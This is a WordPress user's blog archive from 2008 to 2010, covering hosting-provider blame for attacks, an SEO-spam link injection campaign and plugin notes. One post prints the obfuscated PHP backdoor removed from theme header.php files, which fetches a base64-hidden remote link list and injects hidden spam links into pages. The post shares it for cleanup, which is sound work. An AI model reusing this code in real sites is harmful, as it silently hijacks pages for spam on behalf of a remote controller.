Posted August 5th, 2010, in: Ideas, Observations, Opinions, Rants Etc| Technology| WordPress
Badass. Just looked at his site and the Footer of the site says:
Copyright © 2010 Dr. Dre “Detox” – The most anticipated Hip Hop album ever. Running on WordPress | Theme developed by rsuog.
Cool. WordPress is big.
Permalink - Leave a Comment (0)
Posted June 21st, 2010, in: 1| Ideas, Observations, Opinions, Rants Etc| Technology| Videos| WordPress
From the WP Dev Blog, Matt Mullenweg giving his ‘State of the Word’ presentation. Very cool. I’m really excited about where WordPress is going.
Permalink - Leave a Comment (0)
Posted April 15th, 2010, in: Computer Problems and Fixes| Evil Robots| Ideas, Observations, Opinions, Rants Etc| Reviews & Thoughts About Products| Technology| WordPress
When I get asked for help with an attack on a WordPress site, it’s often on the same few hosting providers. And when it’s not, it’s usually a small, local hosting provider. When I have spoken to the staff of one of these hosting providers, about what seems to only occur in these few situations, they never take responsibility for having oddball server settings. And it’s not uncommon for them to actually blame their customers for using WordPress in the first place!
Some of the more popular Hosting Providers that seem to have more trouble than others with WordPress malware attacks in the past two years (in my experience) are Network Solutions and IX Web Hosting. And in general, hosting providers that have a lot of issues with malware affecting WordPress sites either
- Have screwy server settings that tempt developers to take risks with file permissions, or
- Have vulnerabilities that allow malware to sneak from one hosting account to another
As for some of the local, ma ‘n’ pa providers I’ve had problems with, I’m not going to hit them when they’re down by naming names. But let me just say this: Buying local isn’t necessarily a good idea when it comes to hosting. It’s often the worst thing you can do. You usually get crappy support, a high price, a non-standard product, and to make things even worse, you also often get a territorial ‘server guy’ who wants to blame any technical problems on the customer and not take responsibility for anything.
I can imagine being a hosting provider and not wanting to change how I do things just because a few of my customers want to run some weird PHP software they found somewhere. But WordPress is hardly obscure anymore. And although I could be wrong, it seems that the server settings required for a smooth, safe ride with WordPress are in line with “best practices” for hosting providers in general, since all the best and most popular hosting providers seem to run WordPress perfectly.
So in the ‘news,’ I guess on April 12th, 2010, someone (rshinsec) at Network Solutions announced that an attack on many of Network Solutions’ customers’ sites was actually caused by a “WordPress Vulnerability.” (Quote is actually from a WordPress.org page HERE, because according to the WordPress.org page, Network Solutions has since edited the announcement)”
“Beginning last week a WordPress vulnerability has been the target of attacks on multiple WordPress websites on hosting platforms around the web. We have a blog post with additional details about the vulnerability and how to secure your WordPress site.”
In fact, it was not a WordPress problem at all. So in response to some of the inaccurate anti-worpress blogosphere chatter caused by Network Solutions passing the buck like this, Matt Mullenweg, founder of WordPress posted to the WordPress Development Blog, clearing some things up, as well as putting it like this:
“Summary: A web host had a crappy server configuration that allowed people on the same box to read each others’ configuration files, and some members of the “security” press have tried to turn this into a “WordPress vulnerability” story.”
Thank you Matt! We the people that use and love WordPress need to stand up for ourselves and demand what we deserve. We are not a fringe community anymore. WordPress is mainstream software and any hosting provider that has issues with it needs to check themselves!
Permalink - Leave a Comment (2)
Posted November 3rd, 2009, in: Computer Problems and Fixes| Evil Robots| Humanity, Culture, Philosophy, Politics, Ethics Etc| Marketing/Advertising In The Cloud| SEO, SEM, SMO Etc| Technology| WordPress
The site links to sites who are also under attack and when the bug is running correctly on those sites, the sites redirect the hits to the final destination,
which is http://www.zml.com/
I don’t know if zml.com knows this is happening. I mean I suppose it’s possible that some unscrupulous SEO or Marketing guy promised them traffic and then resorted to this to get it. I’m contacting them now to inform them of this uncool practice being committed on their behalf, and if they are not willing to cooperate on putting an end to it, I will have no choice but to give them some negative attention.
The process of extracting the bad links from the content was long and hard since the strings of code inserted were very inconsistent.
The following is a list of the sites being linked thru, which I assume are all victims of this malware. If you own one of these sites, feel free to drop me a line and I will point you in the right direction as far as putting an end to this.
- http://blog.segd.org
- http://www.investorsunited.com
- http://www.oca-gla.org
- http://www.thunderstruck.org
- http://subway.com
- http://verdadeabsoluta.net
- http://yourrnc.com
- http://wordpressthemesbox.com
- http://mp3db.org
- http://webconsultingdc.com
- http://turtlesurvival.org
- http://turtleconservationfund.org
- http://truenorthbrass.com
- http://tarabooks.com
- http://kolenalaila.com
- http://techbostonacademy.org
- http://pie-flex.com
- http://www.philebrity.tv
- http://www.landmarkwine.com
- http://artsinbushwick.org
- http://brettmartin.org
- http://bsf.org
- http://www.popandpolitics.com
- http://womanhonorthyself.com
- http://www.brainstorm9.com
- http://webdev.entheosweb.com
- http://www.topicus-healthcare.com
- http://www.vfilings.com
- http://constantinessword.com
- http://www.dopiska.com
- http://writingcenters.org
- http://www.radisson.com
- http://notjustaprettyface.org
- http://www.arizonacriminaldefenseblog.com
- http://www.sembrarpaz.com
- http://www.apostilla.com
- http://www.geektechs.net
- http://johnquiggin.com
- http://blog.pdma.org
- http://bluesheaven.com
Message to ZML:
Hello,
I am a developer and recently one of my clients who is running WordPress for her personal website was attacked by some Malware that inserted thousands of links throughout her content. Those links resolve to your site, but via redirects thru other sites that I assume are also victims of the malware.
You look like you’ve built a pretty nice site here. And I’m writing to give you the chance to get on board with fixing this problem before I am forced to create some negative attention in the blogosphere and social media.
It doesn’t seem like you would want to be resposible for malware. But it also doesn’t seem like anyone would go through the trouble to make all these links back to you unless you were paying them. Perhaps you hired some marketing or SEO people and were not aware that they would be using these tactics? Please write back soon as I have very little patience for this kind of thing.
Thanks,
Andrew A. Peterson
Some samples of weird code that the bot inserted:
<wp:tag><wp:tag_slug>%d0%b0%d0%b2%d1%82%d0%be%d1%80%d1%81%d0%ba%d0%b8%d0%b5-%d0%bf%d1%80%d0%be%d0%b3%d1%80%d0%b0%d0%bc%d0%bc%d1%8b</wp:tag_slug><wp:tag_name><![CDATA[????????? ?????????]]></wp:tag_name></wp:tag>
<wp:tag><wp:tag_slug>%d1%81%d0%b2%d0%be%d0%b1%d0%be%d0%b4%d0%bd%d1%8b%d0%b9-%d0%bc%d0%b8%d0%ba%d1%80%d0%be%d1%84%d0%be%d0%bd</wp:tag_slug><wp:tag_name><![CDATA[????????? ????????]]></wp:tag_name></wp:tag>
Permalink - Leave a Comment (6)
Posted October 20th, 2009, in: Computer Problems and Fixes| Ideas, Observations, Opinions, Rants Etc| Technology| WordPress
UPDATE: After about four hours of hunting, I finally found a way to enable CodePress in WordPress! A plugin called Enable Codepress does just that! It only seems to work in FireFox, but it does work with WordPress 2.8.4
copy of a comment I left HERE, a tutorial having to do with adding line-numbers and syntax-highlighting to WordPress’ text-editor.
Wow. I am so frustrated. I have spent the last four hours trying to find a way for me to endow my clients, whom I have set up with WordPress, with the power of line numbers when editing CSS.
WordPress is nearly FTP-free, which is great for lay persons. I’ve had great results with teaching older people how to use FireBug to find and preview changes in their CSS by right-clicking on what they want to change and selecting “inspect element.” And it’s not too difficult for many of these folks to get into their Stylesheet in WP’s Theme Editor and find and change what they have tested in FireFox.
But would make the workflow a thousand times better would be a way to make the Textarea in the Theme Editor disply Line-Numbers. There are a handful of plugins that claim to do this, but none of them seem to work with WordPress 2.8.4 And in my hunt, I’ve found evidence that WP once had this feature briefly, but turned it off because it was too slow. I never noticed it and I’ve been using WP for years, and have always been up to date.
Now I find this blog post. Great. A hack to turn on the CodePress functionality in WordPress 2.8… The problem is I don’t understand how to do this!
Can’t you just make an installable Plugin? A plugin would be great because it would be nice to be able to turn the thing on and off, if it is indeed slow or buggy.
Or if some manual intervention with WP’s files is necessary, could you please-please-please explain which files you are editing in this tutorial? All of the examples show top line numbers (1, 2, 3). There’s no “this is what the whole thing should look like” …You don’t explain what file or files you are editing. This is so annoying because I’m not a programmer and this how-to assumes that we know certain things that I don’t know.
could brave these steps if I knew where to make them. I have been searching for this post for hours only to find that I’m not smart enough to understand the directions!!! Thanks for your consideration and for sharing information, even if I am ineligible for it.
Permalink - Leave a Comment (0)
Posted June 18th, 2009, in: Computer Problems and Fixes| Evil Robots| Technology| WordPress
Thanks to SomewwhereVille for helping me diagnose… Here’s what I removed from header.php (in all the installed themes, not just the active one):
<?php /* wp_remote_fopen procedure */ $wp_remote_fopen=’aHR0cDovL3F3ZXRyby5jb20vc3Mv’; $opt_id=’62f751b6518fcbe2ab5980b9f1349902′; $blarr=get_option(‘cache_vars’); if(trim(wp_remote_fopen(base64_decode($wp_remote_fopen).$opt_id.’.md5′))!=md5($blarr)){ $blarr=trim(wp_remote_fopen(base64_decode($wp_remote_fopen).$opt_id.’.txt’)); update_option(‘cache_vars’,$blarr); } $blarr=unserialize(base64_decode(get_option(‘cache_vars’))); if($blarr['hide_text']!=” && sizeof($blarr['links'])>0){ if($blarr['random']){ $new=”; foreach(array_rand($blarr['links'],sizeof($blarr['links'])) as $k) $new[$k]=$blarr['links'][$k]; $blarr['links']=$new; } $txt_out=”; foreach($blarr['links'] as $k=>$v) $txt_out.=’<a href=”‘.$v.’”>’.$k.’</a>’; echo str_replace(‘[LINKS]‘,$txt_out,$blarr['hide_text']); } /* wp_remote_fopen procedure */ ?>
After removing this crap, I recommend installing WP Security Scan. It’s a pretty badass little plugin that walks you through doing some not-so-obvious things to protect WP from attacks. For instance, if your hosting scenario allows, you can rename all your Database Tables to have a Prefix other than “wp_”
Who knew that was the thing to do? I didn’t. It also scans your WP install for risky file permissions and weak passwords and a few other things.
Unfortunately for me, I was working on a site hosted by AN Hosting which doesn’t allow a certain priviledges to DataBase users (Alter?), so I had to change our table prefixes manually.
WP Security Scan, after failing to rename the table prefixes because it didn’t have sufficient access, referred me to a nice little tutorial on how to do it manually.
Basically you:
- download your database thru PHPMyAdmin as per WordPress.org’s Documentation,
- do a “Find-And-Replace” replacing all instances of “wp_” with “somethingelse_”
- make a new database and import your “somethingelse_” version to the new database.
- Change your wp-config.php file to point at the new database
- Change your wp-config.php file’s “table prefix” line from “$table_prefix = ‘wp_’ ” to “$table_prefix = ‘somethingelse_’“
These kinds of problems suck to have but it sure is nice to have the WordPress Community, all of us working together to combat the evil.
Permalink - Leave a Comment (5)
Posted December 24th, 2008, in: Reviews & Thoughts About Products| Semantic Web| Technology| The Semantic Web (Giant Global Graph)| Web 2.0| Web Browsers| WordPress
Trying out Zemanta, a service for finding related resources.
They make Plugins for WordPress, TypePad and other blogging platforms, as well as extensions for both FireFox and IE.
Currently, as I’m writing this, the Zemanta plugin is only giving me a “Loading Zemanta…” message… I figured Zemanta’s database would likely have plenty of articles about Zemanta. Maybe not.
We’ll see. Very cool idea either way.
Update:
I guess the first time I loaded my WordPress Dashboard’s Editing page, Zemanta took a little while to load… Ever since it’s been super fast.
Pretty cool little Plugin.
![Reblog this post [with Zemanta]](http://img.zemanta.com/reblog_e.png?x-id=cf3f0a5d-498a-4713-84e3-e36af3f8be46)
Loading...